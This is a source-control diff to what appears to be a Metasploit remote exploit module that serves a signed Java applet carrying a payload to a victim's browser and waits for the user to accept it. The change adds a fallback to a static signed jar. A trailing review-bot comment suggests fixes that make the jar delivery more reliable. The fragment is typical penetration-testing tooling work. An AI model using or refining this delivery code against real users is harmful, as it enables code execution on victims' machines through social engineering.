Adds a static signed jar and user messages letting them know when it is used.
git-svn-id: file:///home/svn/framework3/trunk@8328 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
42b331b47f
commit
3ecabe1be9
Binary file not shown.
|
@ -113,6 +113,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Currently doing all processing in on_request_uri.
|
||||
# If this is too slow, we can move applet generation up here.
|
||||
#
|
||||
|
||||
@use_static = false
|
||||
|
||||
if not @jvm_init
|
||||
print_error
|
||||
print_error "JVM not initialized. You must install the Java Development Kit, the rjb ruby gem, and set the $JAVA_HOME variable."
|
||||
print_error "Falling back to static signed applet. This exploit will still work, but the CERTCN and APPLETNAME variables will be ignored."
|
||||
print_error
|
||||
@use_static = true
|
||||
end
|
||||
super
|
||||
end
|
||||
|
||||
|
@ -374,43 +384,52 @@ public class #{datastore['APPLETNAME']} extends Applet
|
|||
end
|
||||
end
|
||||
|
||||
appletcode = get_code(cli)
|
||||
if not @use_static
|
||||
appletcode = get_code(cli)
|
||||
|
||||
print_status "Compiling applet classes..."
|
||||
compile( appletcode['classnames'], appletcode['codefiles'] )
|
||||
print_status "Compiling applet classes..."
|
||||
compile( appletcode['classnames'], appletcode['codefiles'] )
|
||||
|
||||
print_status "Compile completed. Building jar file..."
|
||||
print_status "Compile completed. Building jar file..."
|
||||
|
||||
unsignedjar = "unsigned_#{datastore['APPLETNAME']}.jar"
|
||||
@signedjar = "#{datastore['APPLETNAME']}.jar"
|
||||
unsignedjar = "unsigned_#{datastore['APPLETNAME']}.jar"
|
||||
@signedjar = "#{datastore['APPLETNAME']}.jar"
|
||||
|
||||
build_jar( unsignedjar,
|
||||
[ # Applet
|
||||
datastore['APPLETNAME'] + ".class",
|
||||
# PayloadX class
|
||||
datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + ".class",
|
||||
# PayloadX StreamConnector for pure Java payload
|
||||
datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + "$StreamConnector.class" ] )
|
||||
|
||||
print_status "Jar built. Signing..."
|
||||
build_jar( unsignedjar,
|
||||
[ # Applet
|
||||
datastore['APPLETNAME'] + ".class",
|
||||
# PayloadX class
|
||||
datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + ".class",
|
||||
# PayloadX StreamConnector for pure Java payload
|
||||
datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + "$StreamConnector.class" ] )
|
||||
|
||||
print_status "Jar built. Signing..."
|
||||
|
||||
sign_jar( datastore['CERTCN'], unsignedjar, @signedjar )
|
||||
|
||||
print_status "Jar signed. Ready to send."
|
||||
else
|
||||
print_status "Using static, signed jar. Ready to send."
|
||||
end
|
||||
|
||||
sign_jar( datastore['CERTCN'], unsignedjar, @signedjar )
|
||||
|
||||
print_status "Jar signed. Ready to send."
|
||||
|
||||
# TODO: gzip data and parse in java
|
||||
send_response_html( cli, generate_html( data, host, port ), { 'Content-Type' => 'text/html' } )
|
||||
return
|
||||
end
|
||||
|
||||
# load the jar file
|
||||
if File.exists? File.join( datastore['JAVACACHE'], @signedjar )
|
||||
path = File.join( datastore['JAVACACHE'], @signedjar )
|
||||
fd = File.open( path, "rb" )
|
||||
if @use_static
|
||||
path = File.join( Msf::Config.install_root, "data", "exploits", "java_signed_applet.jar" )
|
||||
elsif File.exists? File.join( datastore['JAVACACHE'], @signedjar )
|
||||
path = File.join( datastore['JAVACACHE'], @signedjar )
|
||||
end
|
||||
|
||||
if path
|
||||
fd = File.open( path, "rb" )
|
||||
@jar_data = fd.read(fd.stat.size)
|
||||
fd.close
|
||||
end
|
||||
|
||||
|
||||
print_status( "Sending #{datastore['APPLETNAME']}.jar to #{cli.peerhost}:#{cli.peerport}. Waiting for user to click 'accept'..." )
|
||||
send_response( cli, @jar_data, { 'Content-Type' => "application/octet-stream" } )
|
||||
|
||||
|
|
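Review bot: In the second hunk, when neither arm of the new `if @use_static ... elsif File.exists? ...` selection applies (non-static mode, and `@signedjar` not present in JAVACACHE), `path` is left nil, the `if path` block is skipped, and the `send_response` call below still fires with whatever `@jar_data` already held — nil on the first request, and presumably a jar from an earlier request otherwise, since it is an instance variable — while the status line still claims the applet was sent. Give the guard an else arm that fails loudly instead: `else`, `print_error "Jar file not found, nothing to send."`, `return`. The read would also be safer as the block form, `File.open( path, "rb" ) { |fd| @jar_data = fd.read(fd.stat.size) }`, so the descriptor is closed even if the read raises. In the first hunk, `if not @jvm_init` reads more naturally as `unless @jvm_init`. The enclosing method starts before the hunk, so the fall-through behaviour of the surrounding code is inferred from the visible lines only.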